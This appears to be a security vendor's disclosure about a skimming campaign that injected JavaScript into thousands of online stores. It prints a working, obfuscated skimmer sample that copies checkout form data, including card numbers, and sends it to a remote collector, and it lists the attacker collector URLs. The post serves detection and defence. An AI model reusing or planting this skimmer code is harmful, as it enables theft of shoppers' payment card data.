Criminals have secretly rewired 3,500 online stores to continuously harvest credit card numbers. The fraud can be traced back as far as May 12th 2015, so if you have bought something at one of these stores in the last 6 months, your credit card is likely compromised.

We received reports of suspicious Javascript code through MageReport and have ran a scan on all known shops globally. To our horror, we discovered thousands of credit card hijacking shops.

There are multiple versions found in the wild, but they work the same. The malware is embedded in the header or footer of every page. Once an unsuspecting shopper submits a form that contains anything resembling a credit card number, the whole form is transparently copied, using AJAX, to a remote location.

This is a sample found in the wild, which sends credit card data to http://ownsafety.org/opp.php:

// whitespace added for readability --wdg
function j(e) {
  var t = "; " + document.cookie,
    o = t.split("; " + e + "=");
  return 2 == o.length ? o.pop().split(";").shift() : void 0;
}
j("SESSIID") || (document.cookie = "SESSIID=" + new Date().getTime());
jQuery(function (e) {
  e("button").on("click", function () {
    var t = "",
      o = "post",
      n = window.location;
    if (new RegExp("onepage|checkout").test(n)) {
      for (
        var c = document.querySelectorAll("input, select, textarea, checkbox"),
          i = 0;
        i < c.length;
        i++
      )
        if (c[i].value.length > 0) {
          var a = c[i].name;
          "" == a && (a = i), (t += a + "=" + c[i].value + "&");
        }
      if (t) {
        var l = new RegExp("[0-9]{13,16}"),
          u = new XMLHttpRequest();
        u.open(
          o,
          e("<br/><div/>")
            .html(
              "&#104;&#116;&#116;&#112;&#58;&# 47; & #47;&# 111; & #119;&# 110; & #115;&# 97; & #102;&# 101; & #116;&# 121; & #46;&# 111; & #114;&# 103; & #47;&# 111; & #112;&# 112; & #46;&# 112; & #104;&# 112;"
            )
            .text(),
          !0
        ),
          u.setRequestHeader(
            "Content-type",
            "application/x-www-form-urlencoded"
          ),
          u.send(
            t +
              "&asd=" +
              (l.test(t.replace(/s/g, "")) ? 1 : 0) +
              "&utmp=" +
              n +
              "&cookie=" +
              j("SESSIID")
          ),
          console.clear();
      }
    }
  });
});

We have found other collector servers as well, in order of frequency:

   1860 https://ownsafety.org/opp.php
    390 http://ownsafety.org/opp.php
    309 https://useagleslogistics.com/gates/jquery.php
    100 https://redwiggler.org/wp-content/themes/jquerys.php
     70 https://clickvisits.biz/xrc.php
     28 https://gamula.eu/jquery.php
     23 https://gamula.ru/order.php
     22 https://news-daily.me/gt/
     20 https://antaras.xyz/jquery.php
     17 https://clicksale.xyz/xrc.php
     10 https://ausfunken.com/service/css.php
      9 http://www.dobell.com/var/extendware/system/licenses/encoder/mage_ajax.php
      5 https://redwiggler.org/wp-content/themes/jquery.php
      1 /js/index.php
      1 /js/am/extensions/sitemap_api.php
      1 https://infopromo.biz/lib/jquery.php
      1 https://google-adwords-website.biz/gates/jquery.php
      1 https://bandagesplus.com/order.php
      1 http://nearart.com/order.php
      1 http://happysocks.in/jquery.pl

Revolutionary malware

First, the malware went unnoticed for more than 6 months. It runs in the browser and is stored in the database of the CMS. This makes it hard to discover on a server level. Server measures like a periodic git status or a read-only filesystem will not help.

Second, with this new attack, credit card numbers are captured as soon as an unsuspecting shopper types them in their browser. Until now, credit card thieves mainly targeted (transaction) servers, where payment data is generally encrypted and thus hard to extract. With this new attack, credit cards are captured before they can be encrypted.

And finally, the high number of compromised stores implies extensive automation in discovery and exploitation. This is not the work of script kiddies.

Recommendations

We urge merchants and developers to verify the safety of their shop.

Meanwhile, we have asked the Dutch Cyber Security Center to take the collector servers down. Fixing all the stores involved will take a little longer, but Google will hopefully block these shops in the browser shortly.

Background: going back in time

To determine the first occurrence of this attack, the historical archives at scans.io are a great resource. The University of Michigan provides bi-weekly snapshots for HTTP frontpages for every IPv4 on the planet, going back two years. With some computing power and time, we parsed all the archives until no more traces of the malware could be found (code here). So the first malware was implemented between April 28th and May 12th. It gives interesting insights in its lifecycle, as the malware started by posting to its own address. Later on, likely because more shops were involved, the code switched to central reporting.

Read more

• Persistent Magento backdoor hidden in XML
• Sansec joins forces with Google's VirusTotal
• Sansec and Europol counter online skimming
• Magento wish list exploit bypasses WAF protection
• Is your store’s newsletter being used for phishing?